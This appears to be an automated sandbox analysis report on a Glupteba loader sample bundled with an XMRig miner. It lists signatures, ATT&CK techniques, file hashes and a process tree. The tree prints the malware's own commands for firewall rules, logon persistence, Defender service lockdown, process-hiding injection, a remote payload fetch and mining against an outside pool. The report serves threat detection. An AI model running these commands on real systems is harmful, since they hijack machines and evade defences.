Analysis
-
max time kernel
293s -
max time network
298s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
18-04-2024 22:58
General
-
Target
9ee29181be82641e1df4be22eef2515af005c3163e4aa35225ca63f6b925fe6b.exe
-
Size
4.2MB
-
MD5
2fdd5a843888b6719a6391fe4cc952eb
-
SHA1
082aa8bb52dfe683050f1dbbf6ca1f0a40815454
-
SHA256
9ee29181be82641e1df4be22eef2515af005c3163e4aa35225ca63f6b925fe6b
-
SHA512
c5b4d929856a8851545079d17553ba04db784513aa7651308c8295295a6cc152783ee7e6182709ba797683d56fcfb28aa693b45a501e5137a7c716e374c11685
-
SSDEEP
98304:RU4Iq03aI5N3yqqHwBEspKQ2DvCGo03KUue+TU:DIh7By/QBEsp+2hnfU
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 38 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
XMRig Miner payload 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Executes dropped EXE 5 IoCs
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 7 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 8 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of WriteProcessMemory 45 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9ee29181be82641e1df4be22eef2515af005c3163e4aa35225ca63f6b925fe6b.exe"C:\Users\Admin\AppData\Local\Temp\9ee29181be82641e1df4be22eef2515af005c3163e4aa35225ca63f6b925fe6b.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\9ee29181be82641e1df4be22eef2515af005c3163e4aa35225ca63f6b925fe6b.exe"C:\Users\Admin\AppData\Local\Temp\9ee29181be82641e1df4be22eef2515af005c3163e4aa35225ca63f6b925fe6b.exe"2⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:804⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id ad6dcdc6-83f5-45f8-9171-6f78aa23d1b6 --tls --nicehash -o showlock.net:443 --rig-id ad6dcdc6-83f5-45f8-9171-6f78aa23d1b6 --tls --nicehash -o showlock.net:80 --rig-id ad6dcdc6-83f5-45f8-9171-6f78aa23d1b6 --nicehash --http-port 3433 --http-access-token ad6dcdc6-83f5-45f8-9171-6f78aa23d1b6 --randomx-wrmsr=-15⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 21005⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmptwayc.a1q.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeFilesize
2.0MB
MD5dcb505dc2b9d8aac05f4ca0727f5eadb
SHA14f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA25661f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA51231e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeFilesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeFilesize
5.2MB
MD54f649a57b7ddf3874c9a2163a73e9b07
SHA19c966520ba8233f13f168cade548baf5a30823ba
SHA256830afffc7dd32e007736f0d97e8d02f68f80988266e68e3de3250aa189ac8491
SHA512b2374bac551b0d4e87f38eb0090a9df0705a8600667fecba6a94e5c67ff93fc8b4707a905ce0e5ef0909e91b04dc01d74c21887a5b5958b8b2fd01faed253aac
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5b86ec4136c2ea8664ace1af0c6ae0772
SHA184d6d1a2fdaaf98e08dfdc4e66ff04152c3f1cbd
SHA256cbc470117d18e5c12b27fba5729a2bb75e90ee37a137ffe67adf79851fd2c5eb
SHA5121c00430c3e9d7d5ecbb2d6aaf7b976ae271294fbaa2203e8cdf61035a3c8a76742d586b0bb6a666acbfd001d0e3d01c587e7a6078892a3ce16ac843ae9ac1f04
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD54a5ef44d6e4d7743e1e74cfe725b32c6
SHA1aa271bc13616196b793ee34e4bde73d1fb6b6a4a
SHA256034f67282d0bdad4d57e4863eeb4bde6ef781b47ec1a9be7007b29b5b37d7269
SHA51287ab09e584b721a4f2dcb770e0feec592606db15ee9bf261110166e6155fb9443844f40a095dc46e98d2317d233dfa0c424359697abe644096f63607fff4bd19
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD549a243d52c79932bcab8915dcbddb7bf
SHA11bded1ceee5b97c30b9da77a7c939913d2b06f37
SHA256b41e03704344a07dfd380163d111989a7ca998765f9b4dbf8185f4b660629111
SHA512decbfdef70e71f5bc94f582cbf430d813fb345830db811dd5acdf7ec2b62ccde83a08e118b3654a9f85cb8ab932a2bcee77a4eeac12d50f5909b9fbcbc61480e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5db72c69b047a28ba7bce9e12611ea9d0
SHA14d782b6aa3bd7a7bc8a3258ae911ed888bac3573
SHA256111192db1c2103c2b720b4c4b669c950973d4ec31986367ef05e7f90669c1ab4
SHA512c36d1b6a0cfd32ed236555297c7f13b69b62af8a20e8e60dd07cd3b14ff383ac747e573bad7817779c472612f5023f140aee9bc2e3ce9f9612043fd0dd2bf0a3
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5093bbef16985f8152ddbedfc53668504
SHA18ff96d5f2f49762244dd53bfa90fd10efbe1b538
SHA2564b488f3c2540228958b2dad24039f3e8640437d8732e1b7622c4b3100dcf7622
SHA5127803401999e64bef48d64bd912951daf4240a996ce0be1ee8cc6aa2c298afc69aaa7f4f088a2bb9a260cc618eb4980168aab0a069cdfe7b3412b2cbb14483083
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5194bcdbac22ed5318e7952816b2951cc
SHA16196f48ca22aded1294bcdca09b950b2cee40dcb
SHA256e7c09ee9e435357b5a4ccac416b69699a089211f8c1c70ae4edb4641b096e19e
SHA512273a6fd34b75f3fbeb27f6735a1558717ad78a688f1ca8bdc6c082b8dfecfd83d6686af99758da24a077dceee0a47df55ae7f9c60ac2559068413d80fdeb0c4d
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD58db055ed41b3939c124a0f5fa91b6d94
SHA1e60a413825190da438b7223e6bbe6792ec5a6e51
SHA25693458eb782b5023d8b3275a6cd53500df527e768348f5bc4e541f16c013b6b58
SHA51219ce486cdfe542ae0d4df8090018c9139c1f16ba6f07e622397b51feedeb24eb36d9e4ab7d5931a3fdc3496db8ec77524567db94a93970aa3f0c2c5cff83276c
-
C:\Windows\rss\csrss.exeFilesize
4.2MB
MD52fdd5a843888b6719a6391fe4cc952eb
SHA1082aa8bb52dfe683050f1dbbf6ca1f0a40815454
SHA2569ee29181be82641e1df4be22eef2515af005c3163e4aa35225ca63f6b925fe6b
SHA512c5b4d929856a8851545079d17553ba04db784513aa7651308c8295295a6cc152783ee7e6182709ba797683d56fcfb28aa693b45a501e5137a7c716e374c11685
-
C:\Windows\windefender.exeFilesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
memory/164-1-0x0000000004D00000-0x0000000005104000-memory.dmpFilesize
4.0MB
-
memory/164-302-0x0000000005110000-0x00000000059FB000-memory.dmpFilesize
8.9MB
-
memory/164-301-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/164-300-0x0000000004D00000-0x0000000005104000-memory.dmpFilesize
4.0MB
-
memory/164-3-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/164-2-0x0000000005110000-0x00000000059FB000-memory.dmpFilesize
8.9MB
-
memory/196-331-0x000000006FC20000-0x000000006FC6B000-memory.dmpFilesize
300KB
-
memory/196-338-0x0000000006CE0000-0x0000000006CF0000-memory.dmpFilesize
64KB
-
memory/196-337-0x0000000009280000-0x0000000009325000-memory.dmpFilesize
660KB
-
memory/196-332-0x000000006FC70000-0x000000006FFC0000-memory.dmpFilesize
3.3MB
-
memory/196-330-0x000000007E590000-0x000000007E5A0000-memory.dmpFilesize
64KB
-
memory/196-552-0x0000000072EF0000-0x00000000735DE000-memory.dmpFilesize
6.9MB
-
memory/196-311-0x00000000079D0000-0x0000000007A1B000-memory.dmpFilesize
300KB
-
memory/196-308-0x0000000072EF0000-0x00000000735DE000-memory.dmpFilesize
6.9MB
-
memory/196-310-0x0000000007A30000-0x0000000007D80000-memory.dmpFilesize
3.3MB
-
memory/196-309-0x0000000006CE0000-0x0000000006CF0000-memory.dmpFilesize
64KB
-
memory/816-2143-0x0000000000400000-0x00000000008E1000-memory.dmpFilesize
4.9MB
-
memory/2100-2148-0x000001E2E0770000-0x000001E2E0790000-memory.dmpFilesize
128KB
-
memory/2168-1802-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1822-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-2093-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1842-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1840-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1838-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1836-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1834-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1832-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1830-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1828-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1826-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1794-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1796-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1798-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1824-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1046-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1045-0x0000000005600000-0x0000000005EEB000-memory.dmpFilesize
8.9MB
-
memory/2168-1044-0x0000000005200000-0x00000000055F9000-memory.dmpFilesize
4.0MB
-
memory/2168-1800-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1804-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1785-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1820-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1818-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1816-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1814-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1812-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1810-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1808-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2168-1806-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2172-1799-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/2172-1795-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/2484-1793-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/2848-795-0x0000000072EF0000-0x00000000735DE000-memory.dmpFilesize
6.9MB
-
memory/2848-586-0x00000000045F0000-0x0000000004600000-memory.dmpFilesize
64KB
-
memory/2848-581-0x000000006FC70000-0x000000006FFC0000-memory.dmpFilesize
3.3MB
-
memory/2848-580-0x000000007E8C0000-0x000000007E8D0000-memory.dmpFilesize
64KB
-
memory/2848-579-0x000000006FC20000-0x000000006FC6B000-memory.dmpFilesize
300KB
-
memory/2848-559-0x00000000045F0000-0x0000000004600000-memory.dmpFilesize
64KB
-
memory/2848-557-0x0000000072EF0000-0x00000000735DE000-memory.dmpFilesize
6.9MB
-
memory/2848-558-0x00000000045F0000-0x0000000004600000-memory.dmpFilesize
64KB
-
memory/4036-798-0x0000000004D50000-0x000000000514F000-memory.dmpFilesize
4.0MB
-
memory/4036-1041-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/4036-304-0x0000000004D50000-0x000000000514F000-memory.dmpFilesize
4.0MB
-
memory/4036-556-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/4036-305-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/4036-803-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/4084-1037-0x0000000072EF0000-0x00000000735DE000-memory.dmpFilesize
6.9MB
-
memory/4084-800-0x0000000006A90000-0x0000000006AA0000-memory.dmpFilesize
64KB
-
memory/4084-802-0x0000000006A90000-0x0000000006AA0000-memory.dmpFilesize
64KB
-
memory/4084-799-0x0000000072EF0000-0x00000000735DE000-memory.dmpFilesize
6.9MB
-
memory/4084-828-0x0000000006A90000-0x0000000006AA0000-memory.dmpFilesize
64KB
-
memory/4084-823-0x000000006FC70000-0x000000006FFC0000-memory.dmpFilesize
3.3MB
-
memory/4084-822-0x000000006FC20000-0x000000006FC6B000-memory.dmpFilesize
300KB
-
memory/4316-1049-0x0000000072E50000-0x000000007353E000-memory.dmpFilesize
6.9MB
-
memory/4316-1051-0x0000000004AC0000-0x0000000004AD0000-memory.dmpFilesize
64KB
-
memory/4316-1050-0x0000000004AC0000-0x0000000004AD0000-memory.dmpFilesize
64KB
-
memory/4316-1052-0x00000000079C0000-0x0000000007D10000-memory.dmpFilesize
3.3MB
-
memory/4616-73-0x000000000A560000-0x000000000A593000-memory.dmpFilesize
204KB
-
memory/4616-82-0x00000000050F0000-0x0000000005100000-memory.dmpFilesize
64KB
-
memory/4616-15-0x00000000085B0000-0x00000000085CC000-memory.dmpFilesize
112KB
-
memory/4616-66-0x00000000096F0000-0x0000000009766000-memory.dmpFilesize
472KB
-
memory/4616-35-0x0000000009630000-0x000000000966C000-memory.dmpFilesize
240KB
-
memory/4616-13-0x0000000008170000-0x00000000081D6000-memory.dmpFilesize
408KB
-
memory/4616-74-0x000000006FB00000-0x000000006FB4B000-memory.dmpFilesize
300KB
-
memory/4616-16-0x0000000008610000-0x000000000865B000-memory.dmpFilesize
300KB
-
memory/4616-75-0x000000006FB50000-0x000000006FEA0000-memory.dmpFilesize
3.3MB
-
memory/4616-76-0x000000000A540000-0x000000000A55E000-memory.dmpFilesize
120KB
-
memory/4616-81-0x000000000A5A0000-0x000000000A645000-memory.dmpFilesize
660KB
-
memory/4616-12-0x0000000007F20000-0x0000000007F86000-memory.dmpFilesize
408KB
-
memory/4616-83-0x000000000A780000-0x000000000A814000-memory.dmpFilesize
592KB
-
memory/4616-276-0x000000000A720000-0x000000000A73A000-memory.dmpFilesize
104KB
-
memory/4616-281-0x000000000A710000-0x000000000A718000-memory.dmpFilesize
32KB
-
memory/4616-299-0x0000000072DF0000-0x00000000734DE000-memory.dmpFilesize
6.9MB
-
memory/4616-11-0x0000000007820000-0x0000000007842000-memory.dmpFilesize
136KB
-
memory/4616-10-0x00000000078F0000-0x0000000007F18000-memory.dmpFilesize
6.2MB
-
memory/4616-14-0x00000000081E0000-0x0000000008530000-memory.dmpFilesize
3.3MB
-
memory/4616-9-0x00000000050F0000-0x0000000005100000-memory.dmpFilesize
64KB
-
memory/4616-6-0x0000000005140000-0x0000000005176000-memory.dmpFilesize
216KB
-
memory/4616-8-0x00000000050F0000-0x0000000005100000-memory.dmpFilesize
64KB
-
memory/4616-7-0x0000000072DF0000-0x00000000734DE000-memory.dmpFilesize
6.9MB